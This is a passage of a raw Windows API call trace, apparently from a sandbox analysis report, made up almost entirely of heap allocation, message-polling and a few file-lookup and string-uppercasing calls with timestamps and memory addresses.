dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0223.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0223.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0223.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0223.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0223.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0223.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0223.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0223.884] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0223.885] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0223.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0223.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0223.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0223.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0223.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0223.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0223.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0223.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0223.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0223.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0223.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0223.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0223.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0223.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0223.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0223.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0223.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0223.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0223.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0223.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0223.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0223.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0223.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0223.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0223.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0223.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0223.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0223.886] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0223.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0223.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0223.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0223.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0223.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0223.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0223.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0223.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0223.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0223.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0223.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0223.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0223.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0223.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0223.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0223.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0223.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0223.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0223.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0223.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0223.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0223.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0223.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0223.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0223.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0223.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0223.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0223.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0223.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0223.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0223.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0223.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0223.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0223.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0223.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0223.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0223.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0223.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0223.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0223.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0223.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0223.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0223.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0223.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0223.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0223.888] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0223.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0223.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0223.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0223.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0223.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0223.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0223.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0223.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0223.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0223.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0223.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0223.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0223.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0223.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0223.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0223.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0223.889] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0223.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0223.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0223.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0223.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0223.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0223.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0223.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0223.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0223.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0223.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0223.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0223.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0223.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0223.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0223.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0223.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0223.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0223.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0223.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0223.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0223.890] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents/My Videos", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x20000, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0x9e2078 [0223.890] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0223.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0223.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0223.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0223.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0223.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0223.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0223.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0223.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0223.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0223.890] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0223.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0223.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0223.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0223.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0223.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0223.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0223.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0223.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0223.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0223.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0223.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0223.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0223.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0223.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0223.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0223.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0223.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0223.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0223.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0223.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0223.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0223.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0223.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0223.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0223.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0223.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0223.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0223.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0223.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0223.892] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0223.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0223.892] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0223.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0223.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0223.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab830 [0223.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0223.892] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0223.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0223.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0223.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0223.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0223.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0223.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0223.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0223.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0223.892] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0223.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0223.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0223.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0223.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0223.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0223.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0223.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0223.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0223.893] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0223.893] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0223.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0223.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0223.893] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0223.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0223.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab9e0 [0223.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0223.893] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0223.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0223.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0223.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0223.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0223.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0223.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0223.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0223.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0223.894] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0223.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0223.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0223.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0223.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0223.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0223.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0223.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0223.894] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0223.894] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0223.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 